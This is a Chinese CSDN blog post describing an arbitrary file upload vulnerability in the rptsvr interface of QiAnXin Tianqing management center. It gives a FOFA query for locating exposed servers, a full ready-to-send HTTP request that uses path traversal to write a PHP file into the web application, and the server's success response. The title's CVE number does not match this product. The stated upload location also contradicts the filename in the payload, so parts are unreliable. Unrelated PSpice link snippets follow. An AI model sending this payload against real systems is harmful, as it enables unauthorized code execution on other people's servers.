天擎 rptsvr 任意文件上传【CVE-2023-50164】

已于 2024-01-26 14:33:36 修改
阅读量1.3k 收藏 16
点赞数 16
分类专栏: 漏洞整理 文章标签: 安全
于 2024-01-26 14:31:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/maxiluo/article/details/135865584
版权
奇安信天擎管理中心V6.7.0.4130版本存在rptsvr接口任意文件上传漏洞,攻击者可上传任意文件。修复建议包括升级到最新版本或禁用/删除该接口。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞名称

奇安信 天擎管理中心 rptsvr接口存在任意文件上传漏洞

影响版本

奇安信 天擎管理中心 <=V6.7.0.4130

漏洞描述

奇安信 天擎管理中心 <=V6.7.0.4130 版本的rptsvr接口存在任意文件上传漏洞,该漏洞的原因是天擎管理中心的 rptsvr 接口没有对上传文件的类型和路径进行有效的检查和过滤,导致攻击者可以通过构造特定的请求参数,将任意文件上传到服务器的任意位置。

该漏洞的修复方法是升级到最新版本的天擎系统,或者在服务器上禁用或删除 rptsvr 接口

FOFA语句

banner="QiAnXin web server" || banner="360 web server"  || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权,购买请联系4008-136-360"

payload

POST /rptsvr/upload HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Content-Length: 414
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data;boundary=---------------------------55433477442814818502792421460
Upgrade-Insecure-Requests: 1

-----------------------------55433477442814818502792421460
Content-Disposition: form-data; name="uploadfile"; filename="../../../application/api/controllers/TController2.php"
Content-Type: text/x-python

<?php
phpinfo();
?>
-----------------------------55433477442814818502792421460
Content-Disposition: form-data; name="token"

skylar_report
-----------------------------55433477442814818502792421460

成功回显

HTTP/1.1 200 OK
Date: Wed, 17 Jan 2024 02:06:50 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 42
Connection: close
Server: QiAnXin web server

{"result":"success", "reason": "uploaded"}

上传地址http://xxxx/application/api/controllers/T.php

PSpice电路模拟
m0_62290784的博客
03-22 1960
一:我们学PSpice有什么用呢?PSpice 为用户提供了模型转换与编辑工具:Model Editor,用户自己下载的模型参数文件可以通过Model. Editor 转换成PSpice 的模型文件,并且可以建立相应的模型符号,并对模型进行模拟仿真。 二:宝藏方法 以我们学的电路第5版B-1中的线性电路为例. 三:文本输入与模拟电 ...
PSpice应用 软件安装和B-1
qq_62011235的博客
03-23 3302
PSpice安装PSPICE 软件具有强大的电路图绘制功能、电路模拟仿真功能、图形后处理功能和元器件符号制作功能,以图形方式输入,自动进行电路检查,生成图表,模拟和计算电路。它的用途非常广泛,不仅可以用于电路分析和优化设计,还可用于电子线路、电路和信号与系统等课程的计算机辅助教学。与印制版设计软件配合使用,还可实现电子设计自动化。被公认是通用电路模拟程序中最优秀的软件,具有广阔的应用前景。这些特点使得 PSPICE 受到广大电子设计工作者、科研人员和高校师生的热烈欢迎,国内许多高校已将其列入电子类本科生和
pspice安装软件
03-01
pspice安装软件 PSPICE是由SPICE(Simulation Program with Integrated Circuit Emphasis)发展而来的用于微机系列的通用电路分析程序。
PSpice9_19.1版本下载
07-11
仿真软件,硬件仿真PSpice9.1,无病毒,好用
全面掌握PSpice电路仿真技能
最新发布
weixin_42527589的博客
03-20 1475
PSpice是一款广泛应用于工业界的电路仿真软件,它基于SPICE(Simulation Program with Integrated Circuit Emphasis)引擎,能够模拟实际电路的行为。PSpice以其强大的功能,精确的模拟结果以及友好的用户界面而受到工程师和学术界的青睐。本教程将引导读者从基础入门到高级应用,全面掌握PSpice的使用方法,帮助电子工程师提高电路设计效率和质量。
Pspice仿真教程
10-26
Pspice仿真教程,包含如何建立仿真图形,常用的仿真流程,参数设置等。
PSpice安装及练习一
y134625789的博客
03-27 6280
首先是PSpice安装: 1.由于在网页下载可能会中病毒,所以我们在找到资源时可以保存到百度网盘上在进行下载。 2.在下载完成之后,找到对应的资源包进行解压就可以安装了 3注意在安装界面要勾选这两个选项 接着是;练习一 打开pspice,创建一个新的TEXT.file,然后输入以下文本 接着并保存后缀为cir文本。关闭并再次打开,在另存为后缀为out的文件。 之后打开cir文件,点击simulation--run。在此基础上打开之前保存的Out文件就可以得到结果 ...
pspice_9.2_安装步骤
12-05
教程详细的介绍了pspice_9.2软件的安装步骤,经过很多次测试,均能够实现!
PSpice安装Pspice的应用——B-1
m0_62012468的博客
03-30 3919
由于浏览器寻找的安装包有中病毒的风险,因此我们会选择将找到的资源包放在百度网盘中 下载。 图片所示的两个文件为下载的资源。第一个为解压后的资源,二个为解压前的资源。 打开解压后的资源,点开Setup。 打开之后点确定。 第一个页面选择两项,这样可得到八个软件。 后面均按nest,最后按fresh PSpice安装完成。 ...
OrCAD Pspice 9.2安装
04-28
OrCAD Pspice 9.2安装说明
PSPICE 学生版9.1安装向导
03-16
PSPICE 学生版9.1安装向导
pspice安装汉化包
01-24
pspice9.1完整版汉化和下载一体化,并且收录了部分源程序和模型。
pspice安装程序
07-02
PSPICE是由SPICE(Simulation Program with Integrated Circuit Emphasis)发展而来的用于微机系列的通用电路分析程序。PSPICE软件具有强大的电路图绘制功能、电路模拟仿真功能、图形后处理功能和元器件符号制作功能,以图形方式输入,自动进行电路检查,生成图表,模拟和计算电路。它的用途非常广泛,不仅可以用于电路分析和优化设计,还可用于电子线路、电路和信号与系统等课程的计算机辅助教学。与印制版设计软件配合使用,还可实现电子设计自动化。被公认是通用电路模拟程序中最优秀的软件,具有广阔的应用前景。
PSPICE9.2使用教程解压安装
06-07
PSPICE9.2使用教程解压安装版,解压安装后皆可使用,大家顶起来!!!!
pspice-chinese
03-11
pspice-chinese,中文版。比较全面,给有需要的伙伴。可以用,比较全面。欢迎大家下载哦 给有需要的伙伴。pspice-chinese,中文版。
Cadence_orcadCIS_pspice_lite_2.7z.002
07-23
orcadCIS_pspice_V17.2 up to HotFix 055 绿色精简版。(无任何功能限制) 含orcadCIS , PSPICE (不含PCB等其它),补丁到055. 6个压缩包,解压大约4.2G
pspice17.2使用初级教程
07-20
下面是一份简单的 PSpice 17.2 使用初级教程: 1. 安装和启动:首先,你需要下载并安装 PSpice 17.2 软件。安装完成后,双击图标启动软件。 2. 创建电路:在软件界面上,选择“文件”>“新建”,然后在电路编辑器...
OrCAD 17.2 Lite
10-05
通过OrCAD提供的教程和实例文件,用户可以逐步掌握电子设计的基本技能,例如如何在Capture中绘制电路图,怎样在CIS中管理元器件,以及如何利用PSpice进行电路仿真。这些实践操作将帮助用户快速上手,提升设计能力,...
Cadence17.2教程pspice
03-11
### 关于Cadence 17.2版本中Pspice教程 #### 安装指南 对于希望安装Cadence PSpice 17.2版本的用户来说,需注意几个关键步骤。当点击安装Cadence软件时,应指定添加安装包路径以及设定不含空格和汉字字符的安装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值